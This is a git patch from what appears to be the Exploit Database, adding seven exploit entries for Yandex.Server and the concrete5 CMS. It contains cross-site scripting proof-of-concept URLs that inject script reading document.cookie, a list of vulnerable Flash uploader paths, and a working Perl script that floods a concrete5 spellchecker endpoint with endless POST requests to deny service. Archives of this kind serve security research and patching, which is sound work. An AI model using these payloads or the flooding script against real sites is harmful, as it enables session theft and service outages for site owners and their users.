From 6a755b7b3d569d8b372a35c38eec75e189021970 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 8 Jun 2015 05:03:42 +0000
Subject: [PATCH] DB: 2015-06-08

7 new exploits
---
 files.csv                       |  7 ++++
 platforms/php/webapps/37224.txt |  9 +++++
 platforms/php/webapps/37225.pl  | 58 +++++++++++++++++++++++++++++++++
 platforms/php/webapps/37226.txt | 19 +++++++++++
 platforms/php/webapps/37227.txt | 15 +++++++++
 platforms/php/webapps/37228.txt | 15 +++++++++
 platforms/php/webapps/37229.txt | 15 +++++++++
 platforms/php/webapps/37230.txt | 15 +++++++++
 8 files changed, 153 insertions(+)
 create mode 100755 platforms/php/webapps/37224.txt
 create mode 100755 platforms/php/webapps/37225.pl
 create mode 100755 platforms/php/webapps/37226.txt
 create mode 100755 platforms/php/webapps/37227.txt
 create mode 100755 platforms/php/webapps/37228.txt
 create mode 100755 platforms/php/webapps/37229.txt
 create mode 100755 platforms/php/webapps/37230.txt

diff --git a/files.csv b/files.csv
index b38469b75..5fb98523c 100755
--- a/files.csv
+++ b/files.csv
@@ -33601,3 +33601,10 @@ id,file,description,date,author,platform,type,port
 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye <= 2.5.7 and Crucible <= 2.5.7 Plugins XML Parsing Unspecified Security Vulnerability",2012-05-17,anonymous,jsp,webapps,0
 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0
+37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 'text' Parameter Cross Site Scripting Vulnerability",2012-05-21,MustLive,php,webapps,0
+37225,platforms/php/webapps/37225.pl,"concrete5 concrete/js/tiny_mce/plugins/spellchecker/rpc.php Remote DoS",2012-05-20,AkaStep,php,webapps,0
+37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0
+37227,platforms/php/webapps/37227.txt,"concrete5 index.php/tools/required/files/replace searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
diff --git a/platforms/php/webapps/37224.txt b/platforms/php/webapps/37224.txt
new file mode 100755
index 000000000..093194ac5
--- /dev/null
+++ b/platforms/php/webapps/37224.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53622/info
+
+Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Yandex.Server 2010 9.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/search/?text=%27);alert(document.cookie)// 
\ No newline at end of file
diff --git a/platforms/php/webapps/37225.pl b/platforms/php/webapps/37225.pl
new file mode 100755
index 000000000..6473e6926
--- /dev/null
+++ b/platforms/php/webapps/37225.pl
@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/53640/info
+
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+
+1. Multiple cross-site scripting vulnerabilities
+
+2. An arbitrary-file-upload vulnerability
+
+3. A denial-of-service vulnerability
+
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+#### p0c 2 [ DDos with RPC 'using simple PERL script]===>
+
+#!/usr/bin/perl
+
+use Socket;
+if (@ARGV < 2) { &usage }
+$rand=rand(10);
+$host = $ARGV[0];
+$dir = $ARGV[1];
+$host =~ s/(http:\/\/)//eg;
+for ($i=0; $i<66; $i--)
+{
+$user="w00t".$rand.$i;
+$data = "Aa"
+;
+$lenx = length $data;
+$rpc = "POST ".$dir."concrete/js/tiny_mce/plugins/spellchecker/rpc.php HTTP/1.1\r\n". # Or use just /index.php
+"Accept: */*\r\n".
+"Content-Type: application/x-www-form-urlencoded\r\n".
+"Accept-Encoding: gzip, deflate\r\n".
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
+"Host: $host\r\n".
+"Content-Length: $lenx\r\n".
+"Connection: Keep-Alive\r\n".
+"Cache-Control: no-cache\r\n\r\n".
+"$data";
+my $port = "80";
+my $proto = getprotobyname('tcp');
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
+connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
+send(SOCKET,"$rpc", 0);
+syswrite STDOUT, "+" ;
+}
+print "\n\n";
+system('ping $host');
+sub usage {
+print "\tusage: \n";
+print "\t$0 <host> </dir/>\n";
+print "\Ex: $0 127.0.0.1 /concrete/\n";
+print "\Ex2: $0 target.com /\n\n";
+exit();
+};
+
+# << ThE|End
\ No newline at end of file
diff --git a/platforms/php/webapps/37226.txt b/platforms/php/webapps/37226.txt
new file mode 100755
index 000000000..f08360acb
--- /dev/null
+++ b/platforms/php/webapps/37226.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/53640/info
+ 
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+ 
+1. Multiple cross-site scripting vulnerabilities
+ 
+2. An arbitrary-file-upload vulnerability
+ 
+3. A denial-of-service vulnerability
+ 
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+
+http://www.example.com/concrete/flash/thumbnail_editor_2.swf
+http://www.example.com/concrete/flash/thumbnail_editor_3.swf
+http://www.example.com/concrete/flash/swfupload/swfupload.swf
+http://www.example.com/concrete/flash/uploader/uploader.swf
\ No newline at end of file
diff --git a/platforms/php/webapps/37227.txt b/platforms/php/webapps/37227.txt
new file mode 100755
index 000000000..27da3e450
--- /dev/null
+++ b/platforms/php/webapps/37227.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+  
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+  
+1. Multiple cross-site scripting vulnerabilities
+  
+2. An arbitrary-file-upload vulnerability
+  
+3. A denial-of-service vulnerability
+  
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance="><script>alert(document.cookie);</script>&fID=4
\ No newline at end of file
diff --git a/platforms/php/webapps/37228.txt b/platforms/php/webapps/37228.txt
new file mode 100755
index 000000000..0012a92a1
--- /dev/null
+++ b/platforms/php/webapps/37228.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+   
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+   
+1. Multiple cross-site scripting vulnerabilities
+   
+2. An arbitrary-file-upload vulnerability
+   
+3. A denial-of-service vulnerability
+   
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance="><script>alert(document.cookie);</script>&fID=owned
\ No newline at end of file
diff --git a/platforms/php/webapps/37229.txt b/platforms/php/webapps/37229.txt
new file mode 100755
index 000000000..0a401b16d
--- /dev/null
+++ b/platforms/php/webapps/37229.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+    
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+    
+1. Multiple cross-site scripting vulnerabilities
+    
+2. An arbitrary-file-upload vulnerability
+    
+3. A denial-of-service vulnerability
+    
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+    
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance="><script>alert("AkaStep");</script>&fID=owned
\ No newline at end of file
diff --git a/platforms/php/webapps/37230.txt b/platforms/php/webapps/37230.txt
new file mode 100755
index 000000000..a9bdd5552
--- /dev/null
+++ b/platforms/php/webapps/37230.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+     
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+     
+1. Multiple cross-site scripting vulnerabilities
+     
+2. An arbitrary-file-upload vulnerability
+     
+3. A denial-of-service vulnerability
+     
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+     
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id="><script>alert(1);</script>&node=owned&display_mode=full&select_mode=&selectedPageID=
\ No newline at end of file